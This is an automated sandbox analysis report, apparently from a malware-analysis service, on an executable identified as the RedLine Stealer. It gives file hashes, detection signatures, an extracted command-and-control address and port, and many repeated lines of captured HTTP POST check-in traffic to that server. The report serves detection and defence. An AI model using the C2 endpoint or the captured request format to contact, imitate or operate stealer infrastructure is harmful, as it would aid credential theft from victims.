Loading ...

Play interactive tourEdit tour

Windows Analysis Report 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe

Overview

General Information

Sample Name:7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
Analysis ID:458960
MD5:2e18a08987838bbc3c26ffdbbcec1e62
SHA1:2dd67d0c7191ab3380bc4a1b9ca3a09c684a2291
SHA256:7c3beb3d9b0a8e0bdc6344a24b3b527b96cb9c845aa6847d8ac9d192f68ff912
Tags:exeRedLineStealer
Infos:

Most interesting Screenshot:

Detection

RedLine
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Uses known network protocols on non-standard ports
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.155.31:11556"], "Bot Id": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      Process Memory Space: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe PID: 968JoeSecurity_RedLineYara detected RedLine StealerJoe Security
        Process Memory Space: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe PID: 992JoeSecurity_RedLineYara detected RedLine StealerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.393a170.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            1.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.393a170.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              2.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.400000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security

                Sigma Overview

                No Sigma rule has matched

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 1.2.7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.393a170.4.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.137.155.31:11556"], "Bot Id": "1"}
                Multi AV Scanner detection for submitted fileShow sources
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeVirustotal: Detection: 38%Perma Link
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeReversingLabs: Detection: 67%
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: System.ServiceModel.pdbl6 source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468518828.000000000112E000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbj source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468229225.00000000010A2000.00000004.00000020.sdmp
                Source: Binary string: jHC:\Windows\System.ServiceModel.pdb source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.466476163.0000000000CF8000.00000004.00000001.sdmp

                Networking:

                barindex
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: global trafficTCP traffic: 192.168.2.3:49725 -> 45.137.155.31:11556
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetArguments"Host: 45.137.155.31:11556Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflate
